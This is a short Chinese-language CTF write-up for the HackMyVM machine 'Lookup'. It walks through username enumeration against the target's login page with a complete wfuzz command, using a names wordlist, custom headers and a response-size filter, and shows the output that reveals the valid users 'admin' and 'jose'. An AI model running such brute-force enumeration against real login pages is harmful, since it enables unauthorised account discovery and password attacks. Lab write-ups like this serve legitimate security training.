靶机地址https://hackmyvm.eu/machines/machine.php?vm=Lookup
直接访问报错,需要在/etc/hosts里设置域名lookup.hmv,再次访问主页显示一个登录页面。
扫描目录没有发现什么敏感文件,也没有什么漏洞,sql注入也不行。只能尝试爆破,先尝试爆出用户名。这里要注意wfuzz的语法,特别是要用多个-H加入必要的头信息。
└─$ wfuzz -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=123456" --hh 74 http://lookup.hmv/login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://lookup.hmv/login.php
Total requests: 10177
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000086: 200 0 L 8 W 62 Ch "admin"
000004897: 200 0 L 8 W 62 Ch "jose"
Total time: 0
Processed Requests: 10177
Filtered Requests: 10175
Requests/sec.: 0